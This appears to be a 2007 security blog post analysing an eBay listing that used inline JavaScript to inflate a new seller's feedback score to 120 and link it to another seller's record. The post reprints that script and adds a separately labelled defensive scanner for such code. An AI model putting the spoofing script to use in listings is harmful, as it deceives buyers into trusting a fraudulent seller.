Which eBay seller would you buy from?

06.14.2007 - 11:02 AM
You have found that product you wanted on eBay and you open your wallet and get your credit card out. All else being equal, which seller would you purchase from?
  • a seller who is new to eBay with no track record of ever selling anything, or
  • an eBay "Power Seller" with at least 120 unique happy previous customers?

The seller with the proven track record of happy customers would surely put you more at ease than the new seller, and your gut feeling may swing your decision toward the reputable seller over his competitor. After all, eBay is nothing more than an intermediary for strangers to buy from and sell to each other, so a good verifiable reputation does wonders for an eBay merchant.

But what happens when the yardstick measuring trust, an important currency on a platform inherently used by strangers, is gamed and artificially inflated? Yesterday, we picked up a story on an eBay Javascript hack that would turn an eBay merchant's ID and rating from looking like this:

To this:

The incident has since been reported to eBay, the listing has been yanked, and the dishonest merchant canned. Surprisingly enough, this dodgy piece of code was pretty straightforward and made no attempt to hide itself. Let's take a quick look at the offending code:

// First, get all links on the page
var nodes = document.body.getElementsByTagName('A');

// For each link on the page,
for (var i = 0; i < nodes.length; i++) {

  // If the text of that link is "0" (zero),
  if (nodes[i].innerHTML == '0') {

    // Then change it from "0" to "120" and include the nice
    // blue eBay star reserved for sellers with feedbacks of 100-499
    nodes[i].innerHTML = '120' +
      '<img align="absmiddle" border="0" height="25" width="25" ' +
      'alt="Feedback score is 100 to 499" ' +
      'src=http://pics.ebaystatic.com/aw/pics/uk/icon/iconTealStar_25x25.gif>';

    // And link it to another seller who actually has that many positive feedbacks
    nodes[i].href = 'http://feedback.ebay.com/ws/eBayISAPI.dll[REMOVED]';

  }
}
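
A defender-side counterpart to the snippet above, as an added example that is not code from the original post or from eBay: a heuristic scanner a marketplace could run over seller-supplied listing HTML to flag inline script that walks the page's links and overwrites their text or target. The rule ids, function names and both sample listings are constructed for illustration.

```javascript
// Added example: heuristic rules for inline script in seller-supplied HTML.
// Rule ids, function names and the sample listings are constructed.
const RULES = [
  { id: 'enumerates-links', re: /getElementsByTagName\s*\(\s*['"]a['"]\s*\)/i },
  { id: 'rewrites-link-markup', re: /\.innerHTML\s*=(?!=)/ },  // assignment, not ==
  { id: 'rewrites-link-target', re: /\.href\s*=(?!=)/ },
  { id: 'injects-feedback-star', re: /Feedback score is|icon\w*Star/i },
];

// Collect the body of every inline <script> element in the description.
function extractInlineScripts(html) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) scripts.push(m[1]);
  return scripts;
}

// Report which rules fired and whether the combination warrants review.
function scanListing(html) {
  const hits = new Set();
  for (const src of extractInlineScripts(html)) {
    for (const rule of RULES) if (rule.re.test(src)) hits.add(rule.id);
  }
  // Walking every link AND overwriting its text or target is the pattern
  // used to fake the feedback score; either half alone is common and benign.
  const suspicious = hits.has('enumerates-links') &&
    (hits.has('rewrites-link-markup') || hits.has('rewrites-link-target'));
  return { matched: [...hits].sort(), suspicious };
}

// Constructed sample: same shape as the snippet above, placeholder URL.
const TAMPERED = `<p>Brand new phone</p><script>
var nodes = document.body.getElementsByTagName('A');
for (var i = 0; i < nodes.length; i++) {
  if (nodes[i].innerHTML == '0') {
    nodes[i].innerHTML = '120<img alt="Feedback score is 100 to 499">';
    nodes[i].href = 'http://feedback.example/placeholder';
  }
}
</script>`;

// Constructed sample: counts links but never modifies them.
const BENIGN = `<p>Brand new phone</p><script>
var n = document.getElementsByTagName('a').length;
</script>`;

console.log(scanListing(TAMPERED), scanListing(BENIGN));
```

Pattern matching of this kind only catches unobfuscated script like the one in this incident, so it complements, rather than replaces, keeping seller-supplied script away from the elements that display reputation.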

We have been closely monitoring "Web 2 dot uh-oh" hacks such as this one, and it is a good example of how, contrary to popular belief, an effective and profitable scam does not need to be crafted with smoke screens to evade FBI or CIA agents (as much as Hollywood might want you to believe). It just needs to be good enough to fool the average Internet shopper. In our latest Security Trends Report, we noted the lowered barrier to entry for would-be non-technical fraudsters, following our discovery of a significant increase in the number of phishing kits (toolkits made for non-technical individuals to set up their own phish sites).

This real-world incident on eBay reminds us that a fraudster armed with a basic understanding of Javascript can make a tidy sum of £670.00, one netizen at a time.

Just for laughs: £670.00 a pop at one victim a day, assuming a 5-day work week (even scammers don't work on weekends), translates to a tidy tax-free grand total of £174,200.00 (US $343,644.34) a year. (Don't get any ideas!)
